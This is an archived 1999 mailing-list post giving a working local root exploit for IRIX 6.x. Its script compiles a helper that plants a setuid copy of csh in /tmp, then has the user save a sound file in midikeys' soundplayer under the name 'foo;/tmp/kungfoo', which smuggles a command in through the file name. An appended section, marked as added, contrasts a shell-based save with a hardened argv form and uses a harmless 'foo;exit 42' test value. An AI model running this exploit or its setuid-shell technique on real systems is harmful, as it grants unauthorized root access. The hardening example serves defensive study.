irix-soundplayer.sh

From: Loneguard (loneguardat_private)
Date: Fri Dec 31 1999 - 03:22:20 PST


    midikeys might not setuid these days but you get the idea...
    
    #!/bin/sh
    #
    # Irix 6.x soundplayer xploit - Loneguard 20/02/99
    #
    # Good example of how bad coding in a non-setuid/privileged process
    # can offer up rewt
    #
    cat > /tmp/crazymonkey.c << 'EOF'
    main() {
    	setuid(0);
    	system("cp /bin/csh /tmp/xsh;chmod 4755 /tmp/xsh");
    }
    EOF
    cc -o /tmp/kungfoo crazymonkey.c
    /usr/sbin/midikeys &
    echo "You should now see the midikeys window, goto the menu that allows you to play sounds and load a wav. This will bring up a soundplayer window. Save the wav as 'foo;/tmp/kungfoo' and go find a rewt shell in tmp"
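
The coding error the post points at, shown beside a hardened form, as an added example that is not part of the original post. It assumes the helper pasted the save name into a shell command line (the post does not show soundplayer's code); `save_via_shell`, `save_via_argv` and the `true` stand-in for the real save command are hypothetical.

```c
/* Added example: `true` stands in for the real save command, and the
 * file name is constructed input with a harmless `exit 42` after the ';'. */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Weak form (assumed): the name becomes part of a shell command line,
 * so /bin/sh treats ';' as a command separator. Returns the exit status. */
int save_via_shell(const char *name) {
    char cmd[512];
    snprintf(cmd, sizeof cmd, "true %s", name);
    int st = system(cmd);
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

/* Hardened form: drop any inherited setuid/setgid identity, then exec
 * an absolute path with an argv array, so no shell parses the name. */
int save_via_argv(const char *name) {
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        /* Group first, then user; a failed drop is fatal. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(126);
        char *argv[] = { "true", "--", (char *)name, NULL };
        execv("/bin/true", argv);       /* location differs by system */
        execv("/usr/bin/true", argv);   /* tried only if the first fails */
        _exit(127);
    }
    int st;
    if (waitpid(pid, &st, 0) < 0) return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

int main(void) {
    const char *name = "foo;exit 42";   /* same shape as the post's save name */
    printf("shell form exit status: %d\n", save_via_shell(name));
    printf("argv form exit status:  %d\n", save_via_argv(name));
    return 0;
}
```

A non-zero status from the shell form means the text after the `;` ran as its own command; the argv form hands the whole string to the program as one argument.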
    


